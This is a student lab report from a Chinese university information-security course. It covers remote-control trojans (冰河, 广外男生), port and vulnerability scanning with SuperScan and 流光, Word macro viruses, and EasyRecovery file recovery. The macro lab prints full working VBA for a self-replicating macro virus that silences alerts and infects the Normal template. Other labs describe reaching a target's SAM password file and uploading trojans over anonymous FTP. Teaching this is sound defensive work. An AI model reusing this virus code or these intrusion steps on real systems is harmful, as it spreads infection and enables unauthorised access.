南昌航空大学实验报告
课程名称: 信息安全 实验名称: 共五次实验
班级: 姓名: 同组人:
指导教师评定: 签名:
实验一 木马攻击与防范
一、实验目的
通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验原理
木马的全称为特洛伊木马,源自古希腊神话。木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。
1.木马的特性
(1)伪装性 (2)隐藏性 (3)破坏性 (4)窃密性
2.木马的入侵途径
木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。
3.木马的种类
(1)按照木马的发展历程,可以分为4个阶段:第1代木马是伪装型病毒,第2代木马是网络传播型木马,第3代木马在连接方式上有了改进,利用了端口反弹技术,例如灰鸽子木马,第4代木马在进程隐藏方面做了较大改动,让木马服务器端运行时没有进程,网络操作插入到系统进程或者应用进程中完成,例如广外男生木马。
(2)按照功能分类,木马又可以分为:破坏型木马,主要功能是破坏并删除文件;服务型木马; DoS攻击型木马;远程控制型木马
三、实验环境
两台运行Windows 2000/XP的计算机,通过网络连接。使用“冰河”和“广外男生”木马作为练习工具。
四、实验内容和结果
任务一 “冰河”木马的使用
1.使用“冰河”对远程计算机进行控制
我们在一台目标主机上植入木马,在此主机上运行G_Server,作为服务器端;在另一台主机上运行G_Client,作为控制端。
打开控制端程序,单击快捷工具栏中的“添加主机”按钮,弹出如图1-5所示对对话框。
图1-5添加计算机
“显示名称”:填入显示在主界面的名称。
“主机地址”:填入服务器端主机的IP地址。
“访问口令”:填入每次访问主机的密码,“空”即可。
“监听端口”:“冰河”默认的监听端口是7626,控制端可以修改它以绕过防火墙。
单击“确定”按钮,即可以看到主机面上添加了test的主机,如图1-6所示。
图1-6添加test主机
这时单击test主机名,如果连接成功,则会显示服务器端主机上的盘符。图1-6显示了test主机内的盘符,表示连接成功。
这时我们就可以像操作自己的电脑一样操作远程目标电脑,比如打开C:\WINNT\system32\config目录可以找到对方主机上保存用户口令的SAM文件。
“冰河”的大部分功能都是在这里实现的,单击“命令控制台”的标签,弹出命令控制台界面,如图1-7所示。
图1-7命令控制台界面
可以看到,命令控制台分为“口令类命令”、“控制类命令”、“网络类命令”、“文件类命令”、“注册表读写”、“设置类命令”。
3.删除“冰河”木马
任务二 “广外男生”木马的使用
查看插入进程
删除注册表中木马文件
删除注册表中木马文件
五,实验感想
通过本次实验了解的一些木马的传播技巧,通过自己动手实践,删除木马,学会了防御木马的一些基本技巧,加深了网络安全的认识。
实验二网络端口扫描
一、实验目的
通过练习使用网络端口扫描器,可以了解目标主机开放的端口和服务程序,从而获取系统的有用信息,发现网络系统的安全漏洞。在实验中,我们将在Windows操作系统下使用Superscan进行网络端口扫描实验,通过端口扫描实验,可以增强学生在网络安全方面的防护意识。利用综合扫描软件“流光”扫描系统的漏洞并给出安全性评估报告。
二、实验原理
(一).端口扫描的原理
一个开放的网络端口就是一条与计算机进行通信的信道,对网络端口的扫描可以得到目标计算机开放的服务程序、运行的系统版本信息,从而为下一步的入侵做好准备。对网络端口的扫描可以通过执行手工命令实现,但效率较低;也可以通过扫描工具实现,效率较高。扫描工具是对目标主机的安全性弱点进行扫描检测的软件。它一般具有数据分析功能,通过对端口的扫描分析,可以发现目标主机开放的端口和所提供的服务以及相应服务软件版本和这些服务及软件的安全漏洞,从而能及时了解目标主机存在的安全隐患。
1.端口的基础知识
端口是TCP协议中所定义的,TCP协议通过套接字(socket)建立起两台计算机之间的网络连接。 TCP/UDP的端口号在0~65535范围之内,其中1024以下的端口保留给常用的网络服务。例如,21端口为FTP服务,23端口为TELNET服务,25端口为SMTP服务,80端口为HTTP服务,110端口为POP3服务等。
2.扫描的原理
扫描的方式有多种,为了理解扫描原理,需要对TCP协议简要介绍一下。
一个TCP头的数据包格式如图2-1所示。它包括6个标志位,其中:
图2-1 TCP数据包格式
扫描往往是入侵的前奏,所以如何有效的屏蔽计算机的端口,保护自身计算机的安全,成为计算机管理人员首要考虑的问题。为了防止对计算机网络端口的扫描,我们可以采用端口扫描监测工具来监测对端口的扫描,防止端口信息外露。常用的端口扫描监测工具包括ProtectX、PortSentry等。此外,安装防火墙也是防止端口扫描的有效方法。
三、实验环境
两台预装Windows 2000/XP的计算机,通过网络相连。SuperScan和流光Fluxay软件。
四、实验内容和步骤
任务一 使用SuperScan扫描
SuperScan具有端口扫描、主机名解析、Ping扫描的功能,其界面如图2-2所示。
1.主机名解析功能
在Hostname Lookup栏中,可以输入IP地址或者需要转换的域名,单击Lookup按钮就可以获得转换后的结果;单击Me按钮可以获得本地计算机的IP地址;单击Interfaces按钮可以获得本地计算机IP地址的详细设置。
2.端口扫描功能
图2-2 SuperScan操作界面
图2-3 端口配置界面
SuperScan也提供了特定端口扫描的功能,在Scan Type栏中选中All select ports in list,就可以按照选定的端口扫描。
3.Ping功能
SuperScan软件的Ping功能提供了检测在线主机和判断网络状况的作用。通过在IP栏中输入起始和结束的IP地址,然后选中Scan Type栏中的Ping only即可单击Start启动Ping扫描了。
任务二 利用流光综合扫描
流光是一款非常优秀的综合扫描工具,不仅具有完善的扫描功能,而且自带了很多猜测器和入侵工具,可方便地利用扫描的漏洞进行入侵。启动后,主界面如图2-4所示。
图2-4主界面
1.扫描主机漏洞
(1)
图2-5扫描设置选项
然后,陆续单击“下一步”按钮,会弹出POP3版本信息和用户密码的对话框以及获取FTP的Banner、尝试匿名登录等对话框,可根据需要进行选择,本例以采用默认值。
图2-7 IPC设置选项
“下一步”,设置对IIS的漏洞扫描选项。之后点击“下一步”,弹出如图2-8所示对话框,这里流光提供了11个漏洞的扫描。可根据需要进行选择。
图2-8 PLUGINS设置选项
图2-9选项对话框
图2-10选择扫描引擎
选择默认的本地主机作为扫描引擎,单击“开始”按钮开始扫描,经过一段时间后,会有类似的扫描结果。
2.分析扫描结果并模拟入侵
(1)端口漏洞分析
我们发现被扫描主机开放的端口,有些开放的端口是极其不安全的,下面列举部分端口及其可能存在的威胁如下:
端口21:FTP端口,攻击者可能利用用户名和密码过于简单,甚至可以匿名登录的漏洞登录到目标主机上,并上传木马或者病毒而控制目标主机。
端口23:Telnet端口,如果目标主机开放23端口,但用户名和密码过于简单,攻击者破解后就可以登录主机并查看任何信息,甚至控制目标主机。
端口80:HTTP端口,此端口开放没有太大的危险,但如果目标主机有SQL注入的漏洞,攻击者就可能利用端口80进行攻击。
端口139:NETBIOS会话服务端口,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。139端口可以被攻击者利用,建立IPC连接入侵目标主机,然后获得目标主机的root权限并放置木马。
端口443:网页浏览端口,主要用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。HTTPS服务一般是通过SSL来保证安全性的,但是SSL漏洞可能会受到黑客的攻击,比如可以黑掉在线银行系统、盗取信用卡帐好等。
端口3389:这个端口的开放使安装了终端服务和全拼输入法的Windows 2000服务器(sp1之前的版本)存在着远程者很容易的拿到Administrator组权限。
(2)FTP漏洞分析
当扫描结果中看到FTP的端口开放,且可以匿名登录,我们就直接利用“流光”提供的入侵菜单进行FTP登录,单击密码破解成功的账号,然后选择connect,直接通过FTP连接到目标主机上。这样就可以往目标主机上传任何文件。包括木马和病毒,可见FTP匿名登录的危害性。
利用help命令,查看ftp命令
五、实验感想
本次试验,在Windows操作系统中安装并运行SuperScan,扫描目标主机端口,嗅探网络服务和操作系统,提交扫描步骤和扫描结果,在Windows操作系统中安装并运行“流光”,查看并记录自己的机器的扫描结果,是否存在安全漏洞,学习net相关命令的使用,尝试利用系统漏洞与目标主机建立连接
实验三脚本病毒和宏病毒分析
一、实验目的
通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。
二、实验环境
操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA
三、实验基础知识要求
Office VBA编程环境
四、实验任务
1.任务性质:验证性实验
2.任务描述: 下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。
3.任务步骤:
(1) 打开Word2000,新建一个文档名为“test”;
(2) 点击“工具-宏-宏”,在对话框“宏的位置”选择“test” ,在宏名中输入“autoclose”,然后点击“创建”按钮;
(3) 在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA;
(4) 点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器 对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK” ;
(5) 点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择 “低” ,在可靠性来源标签中选择“信任对VB项目的访问” ;
(6) 保存并关闭“test”文档;
(7) 新建一个文档test1,关闭后重新打开,观察test1是否被感染。
(8) 清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文 件的autoclose宏。
4.示例程序
Sub autoclose()
' autoclose Macro
' 宏在 20##-8-26 由 jingjd 创建
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayStatusBar = False
'Options.VirusProtection = False
Options.SaveNormalPrompt = False
Const VirusName = "AOPEDMOK"
'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name
'MsgBox ActiveDocument.VBProject.VBComponents(2).Name
Set Doc = ActiveDocument.VBProject.VBComponents
Set Tmp = NormalTemplate.VBProject.VBComponents
Const ExportSource = "E:\aopedmok.txt"
For j = 1 To Doc.Count
If Doc(j).Name = VirusName Then
DocInstalled = 1
Doc(j).Export ExportSource
End If
Next j
For i = 1 To Tmp.Count
If Tmp(i).Name = VirusName Then
TmpInstalled = 1
Tmp(i).Export ExportSource
End If
Next i
If TmpInstalled = 0 Then
Tmp.Import ExportSource
NormalTemplate.Save
End If
If DocInstalled = 0 Then
Doc.Import ExportSource
ActiveDocument.SaveAs ActiveDocument.FullName
End If
MsgBox "HaHa,you are attacked!", 0, "Word,Macro"
End Sub
五、实验结果
1. 首选方法:用最新版的反病毒软件清除宏病毒。使用反病毒软件是一种高效、安全和方便的清除方法,也是一般计算机用户的首选方法。但是宏病毒并不象某些厂商或麻痹大意的人那样认为的有所谓“广谱”的查杀软件,这方面的突出例子就是ETHAN宏病毒。
2..应急处理方法:用写字板或WORD 6.0文档作为清除宏病毒的桥梁。如果您的WORD系统没有感染宏病毒,但需要打开某个外来的、已查出感染有宏病毒的文档,而手头现有的反病毒软件又无法查杀它们,那么您可以试验用下面的方法来查杀文档中的宏病毒:打开这个包含了宏病毒的文档(当然是启用WORD中的“宏病毒防护”功能并在宏警告出现时选择“取消宏”),然后在“文件”菜单中选择“另存为”,将此文档改存成写字板(RTF)格式或WORD6.0格式。
实验五、文件恢复工具的使用
一、实验目的:
了解文件被删除后恢复的方法和原理。
二、实验环境:
一台安装有Windows XP或Windows 2000操作系统的主机和EasyRecovery软件。
三、EasyRecovery软件概述
EasyRecovery 是世界著名数据恢复公司 Ontrack 的技术杰作。它是一个硬盘数据恢复工具,能够帮你恢复丢失的数据以及重建文件系统。其 Professioanl (专业) 版更是囊括了磁盘诊断、数据恢复、文件修复、E-mail 修复等全部 4 大类目19 个项目的各种数据文件修复和磁盘诊断方案。
EasyRecovery 不会向你的原始驱动器写入任何东西,它主要是在内存中重建文件分区表,使数据能够安全地传输到其他驱动器中。你可以从被病毒破坏或是已经格式化的硬盘中恢复数据。
该软件可以恢复大于8.4GB的硬盘,支持长文件名。被破坏的硬盘中像丢失的引导记录、BIOS 参数数据块、分区表、FAT 表和引导区都可以由它来进行恢复。
功能简介:
1.恢复被删除的文件
在EasyRecovery主界面中选择“数据修复”,然后选择DeletedRecovery”进入修复删除文件向导,在第一步首先选择被删除文件所在分区,单击“下一步”按钮,软件会对该分区进行扫描,完成后会在窗口左边窗格中显示该分区的所有 文件夹(包括已删除的文件夹),右边窗格显示已经删除了的文件,可先浏览到被删除文件所在文件夹,然后就可以在右边的文件栏中看到该文件夹下已经删除的文件列表,选定要恢复的文件。
单击“下一步”按钮,先在“恢复到本地驱动器”处指定恢复的文件所保存的位置,这个位置必须是在另外一个分区中。单击“下一步”按钮即开始恢复文件,最后会显示文件恢复的相关信息,单击“完成”按钮后,就可以在设置的恢复的文件所保存的位置找到被恢复的文件。
文件夹的恢复也和文件恢复类似,只需选定已被删除的文件夹,其下的文件也会被一并选定,其后的步骤与文件恢复完全相同。另外,文件恢复功能也可由“数据修复”中的“AdanceRecovery”来实现。
2.恢复已格式化分区中的文件
在主界面的“数据修复”中选择“FormatRecovery”,接下来先选择已格式化的分区,然后扫描分区。扫描完成后,可看到EasyRecovery扫描出来的文件夹都以DIRXX(X是数字)命名,打开其下的子文件夹,名称没有发生改变,文件名也都是完整的,其后的步骤也和前面一样,先选定要恢复的文件夹或文件,然后指定恢复后的文件所保存的位置,最后将文件恢复在指定位置。
需要注意的是,在每一个已删除文件的后面都有一个“状况”标识,用字母来表示,它们的含义是不同的,G表示文件状况良好、完整无缺;D表示文件已经删除;B表示文件数据已损坏;S表示文件大小不符。总之,如果状况标记为G、D、X则表明该文件被恢复的 可能性比较大,如果标记为B、A、N、S,则表明文件恢复成功的可能性会比较小。
3.从损坏的分区中恢复文件
如果分区和文件目录结构受损,可使用RAWRecovery从损坏分区中扫描并抢救出重要文件。RAWRecovery使用文件标识搜索算法从头搜索分区的每个簇,完全不依赖于分区的文件系统结构,也就是说只要是分区中的数据块都有可能被扫描出来,并判断出其文件类型,从而将文件恢复过来。
在主界面的“数据修复”中选择“RAWRecovery”,接下来先选择损坏的分区,然后单击“文件类型”按钮,在出现的“RAWRecovery文件类型”对话框中添加、删除各种文件类型标识,以确定在分区中寻找哪种文件,比如要找Word文档,可将DOC文件标识出来,并单击“保存”按钮退出对话框,接下来的扫描就只针对DOC文件进行,这样目标更明确,速度也更快。恢复的后续步骤和前面完全一样。
4.修复损坏的文件
用前面方法恢复过来的数据有些可能已经损坏了,不过只要损坏得不是太严重就可以用EasyRecovery来修复。
选择主界面中的“文件修复”可以看到EasyRecovery可以修复五种文件:Access、Excel、PowerPiont、Word、ZIP。这些文件修复的方法是一样的,如修复ZIP文件,可选择ZIPRepair,然后在下一个步骤中 选择“浏览文件”按钮导入要修复的ZIP文件,单击“下一步”按钮即可进行文件修复。这样的修复方法也可用于修复在传输和存储过程中损坏的文件。
四、实验内容:
任务一:
在本实验中,讲一个文件删除后采用EasyRecovery软件进行恢复。
(1)在一个磁盘上(以E盘为例)建立一个名为“重要文件.log”的文件,也可以是其他文件,然后采用“Shift+Delete”组合键删除。
(2)安装完EasyRecovery软件后,打开他的主界面,如图1所示。
图1 主界面
(3)单击主界面左面的“Data Recovery”选项,在选择其中的Advanced Recovery选项,如果2所示。
图2 选择数据恢复
(4)这时出现选择回复的磁盘界面,选择需要恢复的磁盘,请记录查找的结果。
五.实验感想
通过本次试验,我了解到了该文件恢复工具的具体使用,并且成功的恢复了删除,格式化的文件。